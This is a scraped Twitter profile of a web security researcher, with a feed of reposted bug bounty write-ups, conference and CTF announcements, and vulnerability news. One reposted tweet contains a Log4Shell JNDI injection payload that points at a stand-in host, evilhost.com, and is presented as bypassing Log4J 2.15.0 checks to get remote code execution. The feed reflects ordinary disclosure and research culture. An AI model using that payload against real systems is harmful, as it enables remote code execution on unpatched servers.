Fredrik N. Almroth (@almroot) 's Twitter Profile
Fredrik N. Almroth

@almroot

Co-Founder & Security Researcher at @detectify. I code things to hack stuff. PGP/MIT: 0xEDF8D9828B06A7F7 #shellpopper

ID: 423282468

Website: https://detectify.com/ Joined: 28-11-2011 09:24:56

922 Tweets

3,3K Followers

667 Following

Fredrik N. Almroth (@almroot):

New campaign targeting security researchers "Threat Analysis Group has identified an ongoing campaign targeting security researchers working on vulnerability research and development at different companies and organizations." blog.google/threat-analysi…

Frans Rosén (@fransrosen):

We did some fun tricks with nginx on bug bounties a while back, and made a post about the configurations being vulnerable labs.detectify.com/2021/02/18/mid…

Romain Cayre (@cayreromain):

I just released RadioSploit, an Android application allowing to sniff and inject Zigbee, Mosart and Enhanced ShockBurst packets from a Samsung Galaxy S20 smartphone without requiring any additional hardware: it diverts the Bluetooth controller to add new offensive capabilities. 1/14

Intigriti (@intigriti):

Alternate data streams sound like this 🤯 to you? Well, thankfully we have Fredrik N. Almroth jumping in to help, telling us how to leak source code or bypass authentication with that 🦀 #bugbountytips 👇

Frans Rosén (@fransrosen):

I found some permission issues when hacking Apple CloudKit. I wrote about three of them on Detectify labs, one where I accidentally deleted all shared Apple Shortcuts. labs.detectify.com/2021/09/13/hac…

Márcio Almeida (@marcioalm):

FIX: Here is a PoC of how to bypass allowedLdapHost and allowedClasses checks in Log4J 2.15.0 to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a} and to bypass allowedClasses just choose a name for a class in the JDK. Deserialization will occur as usual. #Log4Shell 1/n

shubs (@infosec_au):

Damn. This is really cool. Achieving RCE via LFI using Nginx as a way to upload a temporary file, even when PHP is hardened so other techniques will fail - bierbaumer.net/security/php-l…

James Kettle (@albinowax):

Just three days remaining to cast your vote for the top 10 hacking techniques of 2021! Massive thanks to everyone who has already taken part; more voters means higher quality results. portswigger.net/polls/top-10-w…

DC3 VDP (@dc3vdp):

The Department of Defense 🇺🇸 VDP #ResearcheroftheMonth for January 2022 is Fredrik N. Almroth. They submitted a critical report on manipulating DNS that enabled them to add DNS records to a DoD server! #VDPHackersFTW #cybersecurity

STÖK ✌️ (@stokfredrik):

Had a great conversation about Detectify's crowdsource program with Fredrik N. Almroth today in the studio. Def an interesting way of creating a passive income flow: submit a finding, preferably unauth, get it verified and get paid every time it hits / fires on any of their customers!

Frans Rosén (@fransrosen):

I decided to make a homage post to Egor Homakov and Nir Goldshlager about different OAuth-token leakage methods I've been researching – ten years after their blog posts that inspired me to start hunting for bugs ♥️ thank you. labs.detectify.com/2022/07/06/acc…

Frans Rosén (@fransrosen):

I was finally able to disclose one of the examples from my last blog post labs.detectify.com/2022/07/06/acc… Here's the PoC movie from the report to Reddit:

SEC-T (@sec_t_org):

Recording of "JavaScript Prototype Poisoning, an unexplored bug-class, and it's everywhere" by Christoffer Jerkeby & Anton Linné is up: youtube.com/watch?v=VSZCyT…

SANS.edu Internet Storm Center (@sans_isc):

OpenSSL 3.0.7 is out. TL;DR: Punycode issue with international domains used in certs. Needs CA to sign malicious cert. Doesn't look like a "huge deal" IMHO. Relax.. Patch.. Repeat... #openssl

HackingForSoju (@hackingforsoju):

🇸🇪 Midnight Sun CTF is back for its 6th straight year! Registration is open here: midnightsunctf.com 🏆 Qualifiers will run from 08 April, 2023 11:00 UTC -- 09 April, 2023 11:00 UTC 🥇 On-site finals are on 18 August. As always, check ctftime.org for details
